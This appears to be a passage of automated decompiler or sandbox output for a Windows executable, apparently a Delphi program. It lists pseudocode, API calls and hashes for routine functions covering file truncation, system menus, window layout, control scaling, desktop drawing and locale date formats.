                                                                        						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
                                                                        						_t58 = 0;
                                                                        						if(_t44 != 1) {
                                                                        							goto L37;
                                                                        						}
                                                                        						_t46 = 0;
                                                                        						while(_t46 < _t58) {
                                                                        							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
                                                                        								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
                                                                        									goto L37;
                                                                        								} else {
                                                                        									goto L30;
                                                                        								}
                                                                        							}
                                                                        							_t46 = _t46 + 1;
                                                                        						}
                                                                        						goto L30;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        APIs
                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BC8
                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402BEC
                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402C08
                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402C29
                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402C52
                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402C60
                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00402C9B
                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00402CB1
                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402CCC
                                                                        • GetLastError.KERNEL32(000000F5), ref: 00402CE4
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                        • String ID:
                                                                        • API String ID: 1694776339-0
                                                                        • Opcode ID: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction ID: 72d0798c9f897f459679b6debe79a3b22e66610cb6c7dbc6d0f179f518ddef03
                                                                        • Opcode Fuzzy Hash: 9aee0fbc78375ed4c045fe708eee76b85e86ea9ef32a4d9543f669cd10d059a6
                                                                        • Instruction Fuzzy Hash: 07418270108700AAF7309F248B0D72B76A5EB00754F248E3FE096BA6E0D6FDA885975D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00451F78(intOrPtr _a4) {
                                                                        				intOrPtr _t27;
                                                                        				struct HMENU__* _t48;
                                                                        
                                                                        				_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        				if( *((char*)(_t27 + 0x229)) != 0) {
                                                                        					_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                                                                        						_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        						if( *((char*)(_t27 + 0x22f)) != 1) {
                                                                        							_t48 = GetSystemMenu(E0043CC2C( *((intOrPtr*)(_a4 - 4))), 0);
                                                                        							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                                                                        								DeleteMenu(_t48, 0xf130, 0);
                                                                        								DeleteMenu(_t48, 7, 0x400);
                                                                        								DeleteMenu(_t48, 5, 0x400);
                                                                        								DeleteMenu(_t48, 0xf030, 0);
                                                                        								DeleteMenu(_t48, 0xf020, 0);
                                                                        								DeleteMenu(_t48, 0xf000, 0);
                                                                        								return DeleteMenu(_t48, 0xf120, 0);
                                                                        							}
                                                                        							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                                                                        								EnableMenuItem(_t48, 0xf020, 1);
                                                                        							}
                                                                        							_t27 =  *((intOrPtr*)(_a4 - 4));
                                                                        							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                                                                        								return EnableMenuItem(_t48, 0xf030, 1);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t27;
                                                                        			}






                                                                        APIs
                                                                        • GetSystemMenu.USER32(00000000,00000000), ref: 00451FC3
                                                                        • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00451FE1
                                                                        • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FEE
                                                                        • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00451FFB
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00452008
                                                                        • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00452015
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00452022
                                                                        • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0045202F
                                                                        • EnableMenuItem.USER32 ref: 0045204D
                                                                        • EnableMenuItem.USER32 ref: 00452069
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$Delete$EnableItem$System
                                                                        • String ID:
                                                                        • API String ID: 3985193851-0
                                                                        • Opcode ID: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction ID: bab5879344c1d3096d848326a20f741e7fadc53448dec7e96ea0f2bec2258502
                                                                        • Opcode Fuzzy Hash: 9e79a2f5eae3ced763728648782822ab3c69376b2aa35a37c87e7f7102866a52
                                                                        • Instruction Fuzzy Hash: 0F214F703413047AE730AA64CD8EF5A7BE95F05B19F1540A6BA097F2D3C6F9B990861C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E00433F38(intOrPtr __eax, void* __ecx, char _a4) {
                                                                        				char _v5;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				struct HWND__* _v24;
                                                                        				intOrPtr _v28;
                                                                        				void* _v32;
                                                                        				struct tagRECT _v48;
                                                                        				struct tagRECT _v64;
                                                                        				struct HWND__* _t53;
                                                                        				intOrPtr _t55;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t87;
                                                                        				intOrPtr _t94;
                                                                        				intOrPtr _t99;
                                                                        				intOrPtr _t102;
                                                                        				void* _t103;
                                                                        				intOrPtr* _t105;
                                                                        				intOrPtr _t107;
                                                                        				intOrPtr _t111;
                                                                        				intOrPtr _t113;
                                                                        				struct HWND__* _t114;
                                                                        				intOrPtr _t115;
                                                                        				intOrPtr _t117;
                                                                        				intOrPtr _t118;
                                                                        
                                                                        				_t103 = __ecx;
                                                                        				_t102 = __eax;
                                                                        				_v5 = 1;
                                                                        				_t2 =  &_a4; // 0x434259
                                                                        				_t114 = E00434370( *_t2 + 0xfffffff7);
                                                                        				_v24 = _t114;
                                                                        				_t53 = GetWindow(_t114, 4);
                                                                        				_t105 =  *0x495ad0; // 0x496c04
                                                                        				if(_t53 ==  *((intOrPtr*)( *_t105 + 0x30))) {
                                                                        					L6:
                                                                        					if(_v24 == 0) {
                                                                        						L25:
                                                                        						return _v5;
                                                                        					}
                                                                        					_t115 = _t102;
                                                                        					while(1) {
                                                                        						_t55 =  *((intOrPtr*)(_t115 + 0x30));
                                                                        						if(_t55 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t115 = _t55;
                                                                        					}
                                                                        					_t113 = E0043CC2C(_t115);
                                                                        					_v28 = _t113;
                                                                        					if(_t113 == _v24) {
                                                                        						goto L25;
                                                                        					}
                                                                        					_t12 =  &_a4; // 0x434259
                                                                        					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
                                                                        					if(_t60 == 0) {
                                                                        						_t18 =  &_a4; // 0x434259
                                                                        						_t107 =  *0x4323f0; // 0x43243c
                                                                        						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t107);
                                                                        						if(__eflags == 0) {
                                                                        							__eflags = 0;
                                                                        							_v32 = 0;
                                                                        						} else {
                                                                        							_t20 =  &_a4; // 0x434259
                                                                        							_v32 = E0043CC2C( *((intOrPtr*)( *_t20 - 0x10)));
                                                                        						}
                                                                        						L19:
                                                                        						_v12 = 0;
                                                                        						_t65 = _a4;
                                                                        						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                        						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                        						EnumThreadWindows(GetCurrentThreadId(), E00433ECC,  &_v32);
                                                                        						_t127 = _v12;
                                                                        						if(_v12 == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						GetWindowRect(_v24,  &_v48);
                                                                        						_push(_a4 + 0xfffffff7);
                                                                        						_push(_a4 - 1);
                                                                        						E004037D8(_t102, _t127);
                                                                        						_t79 =  *0x496b8c; // 0x0
                                                                        						_t111 =  *0x4311cc; // 0x431218
                                                                        						if(E00403768(_t79, _t111) == 0) {
                                                                        							L23:
                                                                        							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                        								_v5 = 0;
                                                                        							}
                                                                        							goto L25;
                                                                        						}
                                                                        						_t85 =  *0x496b8c; // 0x0
                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x38)) + 0xa0)) == 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						_t87 =  *0x496b8c; // 0x0
                                                                        						if(E0043CC2C( *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x38)) + 0xa0))) == _v24) {
                                                                        							goto L25;
                                                                        						}
                                                                        						goto L23;
                                                                        					}
                                                                        					_t117 = _t60;
                                                                        					while(1) {
                                                                        						_t94 =  *((intOrPtr*)(_t117 + 0x30));
                                                                        						if(_t94 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t117 = _t94;
                                                                        					}
                                                                        					_v32 = E0043CC2C(_t117);
                                                                        					goto L19;
                                                                        				}
                                                                        				_t118 = E004334C0(_v24, _t103);
                                                                        				if(_t118 == 0) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t99 =  *((intOrPtr*)(_t118 + 0x30));
                                                                        						if(_t99 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t118 = _t99;
                                                                        					}
                                                                        					_v24 = E0043CC2C(_t118);
                                                                        					goto L6;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00434370: WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434370: GetParent.USER32(00000000), ref: 0043438D
                                                                        • GetWindow.USER32(00000000,00000004), ref: 00433F5A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043402E
                                                                        • EnumThreadWindows.USER32(00000000,00433ECC,?), ref: 00434034
                                                                        • GetWindowRect.USER32 ref: 0043404B
                                                                        • IntersectRect.USER32 ref: 004340B9
                                                                          • Part of subcall function 004334C0: GlobalFindAtomA.KERNEL32 ref: 004334D4
                                                                          • Part of subcall function 004334C0: GetPropA.USER32 ref: 004334EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$RectThread$AtomCurrentEnumFindFromGlobalIntersectParentPointPropWindows
                                                                        • String ID: <$C$YBC$YBC
                                                                        • API String ID: 3421286612-525053330
                                                                        • Opcode ID: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction ID: c79d42cd8e63d5d6ca071abcab3a340e76f0d134036ba66e97feda9ca407d93a
                                                                        • Opcode Fuzzy Hash: 67c238a949be0a3692a05650b6b0dd3817a18a1ea391561a0b0d11e4fad90527
                                                                        • Instruction Fuzzy Hash: 4D516D75B00209AFCB10DF69C484AAEB7F4AF48358F105566F914EB391D739EE01CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004361C8(intOrPtr* __eax, int __ecx, int __edx) {
                                                                        				char _t62;
                                                                        				signed int _t64;
                                                                        				signed int _t65;
                                                                        				signed char _t107;
                                                                        				intOrPtr _t113;
                                                                        				intOrPtr _t114;
                                                                        				int _t117;
                                                                        				intOrPtr* _t118;
                                                                        				int _t119;
                                                                        				int* _t121;
                                                                        
                                                                        				 *_t121 = __ecx;
                                                                        				_t117 = __edx;
                                                                        				_t118 = __eax;
                                                                        				if(__edx ==  *_t121) {
                                                                        					L29:
                                                                        					_t62 =  *0x436374; // 0x0
                                                                        					 *((char*)(_t118 + 0x98)) = _t62;
                                                                        					return _t62;
                                                                        				}
                                                                        				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
                                                                        					_t107 =  *0x43636c; // 0x1f
                                                                        				} else {
                                                                        					_t107 =  *((intOrPtr*)(__eax + 0x98));
                                                                        				}
                                                                        				if((_t107 & 0x00000001) == 0) {
                                                                        					_t119 =  *(_t118 + 0x40);
                                                                        				} else {
                                                                        					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
                                                                        				}
                                                                        				if((_t107 & 0x00000002) == 0) {
                                                                        					_t121[1] =  *(_t118 + 0x44);
                                                                        				} else {
                                                                        					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                        				}
                                                                        				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
                                                                        					_t64 =  *(_t118 + 0x48);
                                                                        					_t121[2] = _t64;
                                                                        				} else {
                                                                        					if((_t107 & 0x00000001) == 0) {
                                                                        						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
                                                                        						_t121[2] = _t64;
                                                                        					} else {
                                                                        						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                        						_t121[2] = _t64;
                                                                        					}
                                                                        				}
                                                                        				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                        				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                        					_t121[3] =  *(_t118 + 0x4c);
                                                                        				} else {
                                                                        					if(_t65 == 0) {
                                                                        						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                        					} else {
                                                                        						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                        					}
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                        				_t113 =  *0x436374; // 0x0
                                                                        				if(_t113 != (_t107 &  *0x436370)) {
                                                                        					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                        				}
                                                                        				_t114 =  *0x436374; // 0x0
                                                                        				if(_t114 != (_t107 &  *0x436378)) {
                                                                        					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                        				}
                                                                        				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                        					E0041F704( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F6E8( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                        				}
                                                                        				goto L29;
                                                                        			}

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436201
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043621B
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436249
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 0043625F
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 00436297
                                                                        • MulDiv.KERNEL32(?,?,?), ref: 004362AF
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 004362F9
                                                                        • MulDiv.KERNEL32(?,?,0000001F), ref: 00436322
                                                                        • MulDiv.KERNEL32(00000000,?,0000001F), ref: 00436348
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction ID: 5572a461d4d5c649957c28d46cd97aeae1e5ffce9261f6d8a18b716679afef8d
                                                                        • Opcode Fuzzy Hash: 12406acec0809dd684b2cbdaf37a1cf72947fcd2106aa20a73bdfab1a9d6afc8
                                                                        • Instruction Fuzzy Hash: 9C517070204341AFC720EB69C845B6BBBF9AF4D304F06985EB9D6D7352C639E844CB25
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 39%
                                                                        			E00437068(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				struct HWND__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				int _v32;
                                                                        				int _v36;
                                                                        				int _t76;
                                                                        				intOrPtr _t82;
                                                                        				int _t85;
                                                                        				void* _t90;
                                                                        				int _t91;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        				intOrPtr _t96;
                                                                        
                                                                        				_t94 = _t95;
                                                                        				_t96 = _t95 + 0xffffffe0;
                                                                        				_v5 = __ecx;
                                                                        				_t76 =  *((intOrPtr*)( *__edx + 0x38))();
                                                                        				if(_v5 == 0) {
                                                                        					_push(__edx);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_pop(_t90);
                                                                        				} else {
                                                                        					_push(__edx);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_pop(_t90);
                                                                        				}
                                                                        				_v12 = GetDesktopWindow();
                                                                        				_v16 = GetDCEx(_v12, 0, 0x402);
                                                                        				_push(_t94);
                                                                        				_push(0x437183);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t96;
                                                                        				_v20 = SelectObject(_v16, E0041FC84( *((intOrPtr*)(_t90 + 0x40))));
                                                                        				_t91 = _v36;
                                                                        				_t85 = _v32;
                                                                        				PatBlt(_v16, _t91 + _t76, _t85, _v28 - _t91 - _t76, _t76, 0x5a0049);
                                                                        				PatBlt(_v16, _v28 - _t76, _t85 + _t76, _t76, _v24 - _t85 - _t76, 0x5a0049);
                                                                        				PatBlt(_v16, _t91, _v24 - _t76, _v28 - _v36 - _t76, _t76, 0x5a0049);
                                                                        				PatBlt(_v16, _t91, _t85, _t76, _v24 - _v32 - _t76, 0x5a0049);
                                                                        				SelectObject(_v16, _v20);
                                                                        				_pop(_t82);
                                                                        				 *[fs:eax] = _t82;
                                                                        				_push(0x43718a);
                                                                        				return ReleaseDC(_v12, _v16);
                                                                        			}

                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0043709F
                                                                        • GetDCEx.USER32(?,00000000,00000402), ref: 004370B2
                                                                        • SelectObject.GDI32(?,00000000), ref: 004370D5
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004370FB
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043711D
                                                                        • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0043713C
                                                                        • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 00437156
                                                                        • SelectObject.GDI32(?,?), ref: 00437163
                                                                        • ReleaseDC.USER32 ref: 0043717D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ObjectSelect$DesktopReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 1187665388-0
                                                                        • Opcode ID: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction ID: 771ec133291533bbbaf77add90e3910cc377049704c9dec5494c1e876cde8f30
                                                                        • Opcode Fuzzy Hash: e8a8121868ac27e57e4faa29e38f03b396699f147222c45ad547c2109a57c072
                                                                        • Instruction Fuzzy Hash: 66310BB6A04219BFDB00DEADCC85DAFB7FCEF49704B014469B544F7281C679AD048BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0040AFB0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				char _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				char _v40;
                                                                        				char _v44;
                                                                        				char _v48;
                                                                        				char _v52;
                                                                        				char _v56;
                                                                        				char _v60;
                                                                        				char _v64;
                                                                        				char _v68;
                                                                        				void* _t104;
                                                                        				void* _t111;
                                                                        				void* _t133;
                                                                        				intOrPtr _t183;
                                                                        				intOrPtr _t193;
                                                                        				intOrPtr _t194;
                                                                        
                                                                        				_t191 = __esi;
                                                                        				_t190 = __edi;
                                                                        				_t193 = _t194;
                                                                        				_t133 = 8;
                                                                        				do {
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t133 = _t133 - 1;
                                                                        				} while (_t133 != 0);
                                                                        				_push(__ebx);
                                                                        				_push(_t193);
                                                                        				_push(0x40b27b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t194;
                                                                        				E0040AE3C();
                                                                        				E00409A84(__ebx, __edi, __esi);
                                                                        				_t196 =  *0x4967fc;
                                                                        				if( *0x4967fc != 0) {
                                                                        					E00409C5C(__esi, _t196);
                                                                        				}
                                                                        				_t132 = GetThreadLocale();
                                                                        				E004099D4(_t43, 0, 0x14,  &_v20);
                                                                        				E0040439C(0x496730, _v20);
                                                                        				E004099D4(_t43, 0x40b290, 0x1b,  &_v24);
                                                                        				 *0x496734 = E004087C0(0x40b290, 0, _t196);
                                                                        				E004099D4(_t132, 0x40b290, 0x1c,  &_v28);
                                                                        				 *0x496735 = E004087C0(0x40b290, 0, _t196);
                                                                        				 *0x496736 = E00409A20(_t132, 0x2c, 0xf);
                                                                        				 *0x496737 = E00409A20(_t132, 0x2e, 0xe);
                                                                        				E004099D4(_t132, 0x40b290, 0x19,  &_v32);
                                                                        				 *0x496738 = E004087C0(0x40b290, 0, _t196);
                                                                        				 *0x496739 = E00409A20(_t132, 0x2f, 0x1d);
                                                                        				E004099D4(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                        				E00409D0C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                        				E0040439C(0x49673c, _v36);
                                                                        				E004099D4(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                        				E00409D0C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                        				E0040439C(0x496740, _v44);
                                                                        				 *0x496744 = E00409A20(_t132, 0x3a, 0x1e);
                                                                        				E004099D4(_t132, 0x40b2c4, 0x28,  &_v52);
                                                                        				E0040439C(0x496748, _v52);
                                                                        				E004099D4(_t132, 0x40b2d0, 0x29,  &_v56);
                                                                        				E0040439C(0x49674c, _v56);
                                                                        				E00404348( &_v12);
                                                                        				E00404348( &_v16);
                                                                        				E004099D4(_t132, 0x40b290, 0x25,  &_v60);
                                                                        				_t104 = E004087C0(0x40b290, 0, _t196);
                                                                        				_t197 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					E004043E0( &_v8, 0x40b2e8);
                                                                        				} else {
                                                                        					E004043E0( &_v8, 0x40b2dc);
                                                                        				}
                                                                        				E004099D4(_t132, 0x40b290, 0x23,  &_v64);
                                                                        				_t111 = E004087C0(0x40b290, 0, _t197);
                                                                        				_t198 = _t111;
                                                                        				if(_t111 == 0) {
                                                                        					E004099D4(_t132, 0x40b290, 0x1005,  &_v68);
                                                                        					if(E004087C0(0x40b290, 0, _t198) != 0) {
                                                                        						E004043E0( &_v12, 0x40b304);
                                                                        					} else {
                                                                        						E004043E0( &_v16, 0x40b2f4);
                                                                        					}
                                                                        				}
                                                                        				_push(_v12);
                                                                        				_push(_v8);
                                                                        				_push(":mm");
                                                                        				_push(_v16);
                                                                        				E004046C0();
                                                                        				_push(_v12);
                                                                        				_push(_v8);
                                                                        				_push(":mm:ss");
                                                                        				_push(_v16);
                                                                        				E004046C0();
                                                                        				 *0x4967fe = E00409A20(_t132, 0x2c, 0xc);
                                                                        				_pop(_t183);
                                                                        				 *[fs:eax] = _t183;
                                                                        				_push(E0040B282);
                                                                        				return E0040436C( &_v68, 0x10);
                                                                        			}

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,0040B27B,?,?,00000000,00000000), ref: 0040AFE6
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                        • API String ID: 4232894706-2493093252
                                                                        • Opcode ID: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction ID: ab645d97e84e0256c4c4970a1fb5dcc84b1706c9c56c8f89f877431b82433d7f
                                                                        • Opcode Fuzzy Hash: 57064a61c693a148e843b2285f5530ec02f9961804421419e221219622123def
                                                                        • Instruction Fuzzy Hash: 28613A707001489BDB04EBE9E881A9F77A6DB98308F20947FA501BB3D6DA3CDD05879C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

